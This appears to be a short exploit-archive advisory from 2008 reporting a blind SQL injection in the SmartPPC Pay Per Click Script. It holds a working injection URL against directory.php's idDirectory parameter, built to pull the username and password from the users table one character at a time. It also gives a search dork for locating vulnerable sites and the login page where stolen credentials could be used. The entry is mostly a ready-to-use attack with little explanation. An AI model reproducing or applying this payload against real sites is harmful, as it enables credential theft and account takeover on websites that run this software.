id: 3363
date: 07/06/2008
title: SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Vuln
author: Hamtaro
cves: 

====================================================================
SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Vuln
====================================================================



+---------------------------------------+
|   Blind SQL Injection Vulnerability   |
|      in  Pay Per Click Script         |
|     found by Hamtaro aka CorVu5       |
|there must be 50 ways to learn to hover|
+---------------------------------------+
 
#gdork: "Pay Per Click Script powered by SmartPPC.com."
 
#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
 
#login: site.com/accounts.php
---------------------------------------



#  0day.today [2023-03-24]  #